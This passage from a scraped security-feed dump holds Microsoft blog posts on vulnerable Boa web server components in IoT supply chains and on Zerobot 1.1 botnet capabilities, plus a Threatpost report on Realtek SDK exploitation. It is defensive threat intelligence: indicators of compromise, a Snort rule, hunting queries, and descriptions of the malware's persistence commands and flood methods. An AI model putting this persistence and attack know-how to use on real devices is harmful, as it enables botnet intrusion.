Future. While these IP addresses are not confirmed as malicious, we recommend they be monitored to ensure no additional suspicious activity. 
Users of Microsoft Defender Threat Intelligence will find these IP addresses in the portal labeled as block-listed or suspicious:\n\n * 122[.]117[.]212[.]65\n * 103[.]58[.]93[.]133\n * 125[.]141[.]38[.]53\n * 14[.]45[.]33[.]239\n * 14[.]55[.]86[.]138\n * 183[.]108[.]133[.]29\n * 183[.]99[.]53[.]180\n * 220[.]94[.]133[.]121\n * 58[.]76[.]177[.]166\n\nInvestigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services, with many of the IP addresses associated with IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. Most of the suspicious HTTP response headers were returned over a short timeframe of several days, leading researchers to believe they may be associated with intrusion and malicious activity on networks.\n\nSince the report\u2019s publication, Microsoft researchers tracking the published IP hosts have observed that all IP addresses have been compromised by a variety of attackers employing different malicious methods. For example, some of the IP addresses were further leveraged to download a variant of the Mirai malware family shortly following the report's release. Microsoft also found evidence that across different devices on the IP addresses, there were attempts to connect with default credentials through brute force methods and attempts to run shell commands. Microsoft continues to see attackers attempting to exploit Boa vulnerabilities beyond the timeframe of the released report, indicating that it is still targeted as an attack vector.\n\n## Boa widespread through SDKs\n\nThe Boa web server is widely implemented across a variety of devices, including IoT devices ranging from routers to cameras, and is often used to access settings and management consoles as well as sign-in screens. 
The popularity of Boa web servers is especially concerning as Boa has been formally discontinued since 2005. Data from the Microsoft Defender Threat Intelligence platform identified over 1 million internet-exposed Boa server components around the world over the span of a week, as depicted in the below figure:\n\nFigure 1. Global mapping of internet-exposed Boa web servers on devices\n\nBoa web servers remain pervasive in the development of IoT devices; one reason for this could be their inclusion in popular SDKs, which contain the essential functions that operate the system on chip (SOC) implemented in microchips. Vulnerable components like Boa and SDKs are often distributed to customers within devices, contributing to [supply chain vulnerabilities](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>). Popular SDKs, like those released by Realtek, are used in SOCs provided to companies that manufacture gateway devices like routers, access points, and repeaters. Critical vulnerabilities such as [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>), which affected the digital administration of devices using Realtek\u2019s SDK, and [CVE-2022-27255](<https://nvd.nist.gov/vuln/detail/CVE-2022-27255>), a zero-click overflow vulnerability, [reportedly affect millions of devices](<https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/>) globally and allow attackers to launch code, compromise devices, [deploy botnets](<https://www.bleepingcomputer.com/news/security/botnet-targets-hundreds-of-thousands-of-devices-using-realtek-sdk/?fbclid=IwAR1Bp2n0EXpD01pNGfs7T24Rdc2HeCPrN4za5Pj21CXFNPgOFFG-I_ZMXtg>), and move laterally on networks.\n\nWhile patches for the Realtek SDK vulnerabilities are available, some vendors may not have included them in their device firmware updates, and the updates do not include patches for Boa vulnerabilities. 
Boa servers are affected by several known vulnerabilities, including CVE-2009-4496, which could allow attackers to execute code remotely. Additional vendor- and device-specific vulnerabilities exist across a range of devices, including routers.\n\nFigure 2. The IoT device supply chain demonstrates how vulnerabilities are distributed downstream to organizations and their assets\n\nThe popularity of the Boa web server illustrates the potential exposure risk of an insecure supply chain, even when security best practices are applied to devices in the network. Updating the firmware of IoT devices does not always patch SDKs or specific SOC components, and there is limited visibility into those components and whether they can be updated. The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials. In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.\n\n## Recommendations\n\nAs attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations. 
This case displays the importance of proactive cybersecurity practices and the need to identify vulnerable components that may be leveraged by attackers.\n\nMicrosoft recommends that organizations and network operators follow best practice guidelines for their networks:\n\n * **Patch vulnerable devices whenever possible** to reduce exposure risks across your organization.\n * **Utilize device discovery and classification** to identify devices with vulnerable components by enabling vulnerability assessments, which identify unpatched devices in the organizational network, and set workflows for initiating appropriate patch processes with solutions like [Microsoft Defender Vulnerability Management](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management>) and [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) with [Microsoft Defender for IoT](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-microsoft-defender-for-iot-integration>).\n * **Extend vulnerability and risk detection beyond the firewall** with platforms like [Microsoft Defender External Attack Surface Management](<https://learn.microsoft.com/azure/external-attack-surface-management/>). Customers can identify internet-exposed infrastructure running Boa web server components in their inventory and use the insights tile under the Attack Surface Summary dashboard to surface assets vulnerable to CVE-2009-4496. The insight can be found under High Severity Observations.\n * **Reduce the attack surface** by eliminating unnecessary internet connections to IoT devices in the network. Apply network segmentation to prevent an attacker from moving laterally and compromising assets after intrusion. 
IoT and critical device networks should be isolated with firewalls.\n * **Use proactive antivirus scanning** to identify malicious payloads on devices.\n * **Configure detection rules to identify malicious activity** whenever possible. Security personnel can use our Snort rule below to configure security solutions to detect CVE-2022-27255 on assets using the RealTek SDK.\n \n \n alert udp any any -> any any (msg:\"Realtek eCOS SDK SIP Traffic Exploit CVE-2022-27255\"; content: \"invite\"; depth: 6; nocase; content: \"sip:\"; content: \"m=audio \"; isdataat: 128,relative; content:!\"|0d|\"; within: 128;sid:20221031;)\n\n * **Adopt a comprehensive IoT and OT solution** like [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to monitor devices, respond to threats, and increase visibility in order to detect and alert when IoT devices with Boa are used as an entry point to a network and protect critical infrastructure. \n\n_**Adam Castleman, Jordan Herman**, Microsoft Defender Threat Intelligence_ \n_**Rotem Sde Or, Ilana Sivan, Gil Regev**, Microsoft Defender for IoT Research Team_ \n_**Ross Bevington**, Microsoft Threat Intelligence Center_\n\nThe post [Vulnerable SDK components lead to supply chain risks in IoT and OT environments](<https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, 
"published": "2022-11-22T17:00:00", "type": "mssecure", "title": "Vulnerable SDK components lead to supply chain risks in IoT and OT environments", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4496", "CVE-2021-35395", "CVE-2021-44228", "CVE-2022-27255"], "modified": "2022-11-22T17:00:00", "id": "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "href": "https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T20:16:24", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continues to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. 
Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. 
Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. 
Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh_ that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. Because IoT devices are built on many different CPU architectures, the bash script that attempts to download different Zerobot binaries identifies the architecture by brute force, attempting to download and execute binaries for various architectures until one succeeds. Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. 
While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe_). Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop_.\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. 
\nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. 
This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least-privilege access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and, for unmanaged solutions, enable Smart App Control.\n * Perform timely 
cleanup of all unused and stale executables sitting on your or your organization\u2019s devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits, which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. 
With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), 
SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n**SparkRat hashes (SHA-256)**\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mssecure", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-24T02:09:46", "description": "Threat actors zeroing in on command injection vulnerabilities reported in Realtek chipsets just days after multiple flaws were discovered in the software developers kits (SDK) deployed across 
at least 65 separate vendors.\n\nOn Aug. 16 multiple [Realtek vulnerabilities](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>) were disclosed by IoT Inspector Research Lab. It took about 48 hours for attackers to start trying to exploit them. SAM Seamless Network reported that, two days after the bugs were made public, attackers made \u201cmultiple\u201d attempts to breach the company\u2019s Secure Home product to [spread a new version of Mirai malware](<https://securingsam.com/realtek-vulnerabilities-weaponized/>).\n\n\u201cSpecifically, we noticed exploit attempts to \u2018formWsc\u2019 and \u2018formSysCmd\u2019 web pages,\u201d SAM\u2019s report on the incident said. \u201cThe exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks. Mirai is a notorious IoT and router malware circulating in various forms for the last 5 years. It was originally used to shut down large swaths of the internet but has since evolved into many variants for different purposes.\u201d\n\nThe report goes on to link another similar attack to the attack group. On Aug. 6 Juniper Networks found a vulnerability that just two days later was also exploited to try and deliver the same Mirai botnet using the same network subnet, the report explained.\n\n\u201cThis chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly,\u201d SAM said. \u201cThese kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.\u201d\n\nRealtek Semiconductor Corp. 
has not yet responded to Threatpost\u2019s request for comment, but the company did release [this advisory](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) on CVE-2021-35392, CVE-2021-35393, CVE-2021-35394, CVE-2021-35395.\n\n[Mirai\u2019s source code has exploded in popularity](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) over the years, with more than [60 variants](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) observed in the wild by last March. That number is still climbing with this latest iteration tailored to target the Realtek SDK flaws.\n\n## **Devices Targeted**\n\nConsidering the number of vendors impacted, researchers are concerned threat actors have ample first-move opportunities to exploit the bug before patches are deployed.\n\nSAM said the devices most exposed to the Realtek SDK bug are:\n\n * Netis E1+ extender\n * Edimax N150 and N300 Wi-Fi router\n * Repotec RP-WR5444 router\n\nThe original IoT Inspector report linked this kind of vulnerability to recent supply chain attacks on [SolarWinds](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) and [Kaseya](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>).\n\n\u201cAs awareness for supply chain transparency is on the rise among security experts, this example is a pretty good showcase of the vast implications of an obscure IoT supply chain,\u201d the IoT Inspector report said.\n\nJust a day after the Realtek revelations, Mandiant, in coordination with the Cybersecurity and Infrastructure Security Agency (CISA), reported [a flaw in IoT cloud](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) platform ThroughTek Kalay. 
The vulnerability would have potentially allowed an attacker to take over an IoT device to listen to live audio, watch real-time video and more.\n\n\u201cThese types of vulnerabilities are surfacing every day and there are probably many more that have yet to be discovered\u2026,\u201d SAM\u2019s Ran Hananel told Threatpost by email.\n\n## **Securing IoT**\n\nYaniv Bar-Dayan, co-founder of Vulcan Cyber, told Threatpost that IoT security is inherently tricky because often it\u2019s not clear who is responsible for the data.\n\n\u201cWhile the responsibility to bring bug fixes and patches to market should lie on the shoulders of vendors, users should be sure to rely on tried-and-true security best practices in the meantime,\u201d Bar-Dayan said. \u201cEncrypt data, use sophisticated and unique passwords or multi-factor authentication, don\u2019t broadcast your network ID, double check configurations, and, above all else, patch early and often.\u201d\n\nBesides patching, Jake Williams at BreachQuest recommends limiting web interface access to the local network.\n\n\u201cThat won\u2019t stop attacks but does limit where they can be conducted from,\u201d Williams said. \u201cThis is particularly true for administrative interfaces.\u201d\n\nIt\u2019s also up to developers to know the code they\u2019re using is secure. [Software Bills of Materials (SBOMs)](<https://threatpost.com/executive-order-cybersecurity-federal-agencies/165056/>) are one solution being pushed by the U.S. government in the wake of the SolarWinds breach.\n\n\u201cDevelopers of any type of software like to use SDKs because it enables them to implement capabilities into their software without having to build it themselves,\u201d Hank Schless from Lookout told Threatpost. \u201cThis is broadly practiced, and there\u2019s a level of implicit trust that developers have in those that build these SDKs that everything packaged inside of them will be safe. 
However, just like with any other type of software, SDKs have their inevitable flaws.\u201d\n", "cvss3": {}, "published": "2021-08-23T14:08:42", "type": "threatpost", "title": "Attackers Actively Exploiting Realtek SDK Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35392", "CVE-2021-35393", "CVE-2021-35394", "CVE-2021-35395"], "modified": "2021-08-23T14:08:42", "id": "THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA", "href": "https://threatpost.com/attackers-exploiting-realtek/168856/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2022-12-08T23:19:41", "description": "> **December 8, 2022 update** - Reflected additional research on Boa-related CVEs and updated supply chain diagram.\n\nVulnerabilities in network components, architecture files, and developer tools have become increasingly popular attack vectors to gain access into secure networks and devices. External tools and products that are managed by vendors and developers can pose a security risk, especially to targets in sensitive industries. Attacks on software and hardware supply chains, like 